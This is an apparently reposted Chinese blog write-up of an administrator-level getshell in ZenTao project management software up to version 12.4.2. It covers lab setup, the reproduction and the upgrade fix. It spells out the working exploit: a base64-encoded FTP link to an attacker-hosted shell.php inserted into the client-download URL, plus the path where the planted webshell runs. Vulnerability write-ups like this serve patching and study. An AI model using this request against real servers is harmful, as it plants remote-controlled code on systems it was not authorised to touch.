温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

禅道12.4.2后台管理员权限Getshell是怎样的

发布时间:2022-01-14 22:39:26 来源:亿速云 阅读:174 作者:柒染 栏目:安全技术

本篇文章给大家分享的是有关禅道12.4.2后台管理员权限Getshell是怎样的,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。

0x00简介

禅道是一款专业的国产开源研发项目管理软件,集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,完整覆盖了研发项目管理的核心流程。管理思想基于国际流行的敏捷项目管理方法——Scrum,在遵循其价值观的基础上,结合国内项目研发现状,整合了任务管理、需求管理、Bug管理、用例管理等多种功能,覆盖软件从计划到发布的整个生命周期。

0x01漏洞概述

禅道12.4.2版本存在任意文件下载漏洞,该漏洞是因为client类中download方法中过滤不严谨可以使用ftp达成下载文件的目的。且下载文件存储目录可解析php文件,造成getshell。

0x02影响版本

禅道≤ 12.4.2

0x03环境搭建

phpstudy2018 + 禅道12.4.2  禅道官方下载地址:

https://www.zentao.net/dynamic/zentaopms12.4.2-80263.html

3.1. 下载完成后,放入phpstudy中安装即可

禅道12.4.2后台管理员权限Getshell是怎样的

3.2. 检查扩展,要是存在未通过的扩展,在phpstudy中开启扩展即可。

禅道12.4.2后台管理员权限Getshell是怎样的

3.3.设置数据库信息,这里设置成自己的数据库配置。

禅道12.4.2后台管理员权限Getshell是怎样的

3.4.设置账号安装完成

禅道12.4.2后台管理员权限Getshell是怎样的

3.4.利用环境搭建,开启ftp服务,以windows2008R2为例,在添加角色,添加ftp

禅道12.4.2后台管理员权限Getshell是怎样的

禅道12.4.2后台管理员权限Getshell是怎样的

3.5.然后在Internet信息服务下的网站添加ftp服务。

禅道12.4.2后台管理员权限Getshell是怎样的

3.6.根据自己的情况配置,下一步即可

禅道12.4.2后台管理员权限Getshell是怎样的

禅道12.4.2后台管理员权限Getshell是怎样的

禅道12.4.2后台管理员权限Getshell是怎样的

3.7.在ftp目录下放一个webshell然后浏览器查看ftp是否可以正常访问

禅道12.4.2后台管理员权限Getshell是怎样的

0x04漏洞复现

1.首先把ftp加上shell的路径进行base64编码

加密前: ftp://192.168.3.200/shell.php

加密后: ZnRwJTNBLy8xOTIuMTY4LjMuMjAwL3NoZWxsLnBocA==

2.使用EXP,把加密后的base64放入exp中的<>里

http://127.0.0.1/zentaopms/www/index.php/client-download-1-<base64 encode webshell download link>-1.html

禅道12.4.2后台管理员权限Getshell是怎样的

禅道12.4.2后台管理员权限Getshell是怎样的

3.使用以下链接路径测试是否shell已下载到服务器

http://192.168.3.200/zentaopms/www/data/client/1/shell.php

禅道12.4.2后台管理员权限Getshell是怎样的

0x05修复方式

1、升级到禅道12.4.3及之后的版本

以上就是禅道12.4.2后台管理员权限Getshell是怎样的,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI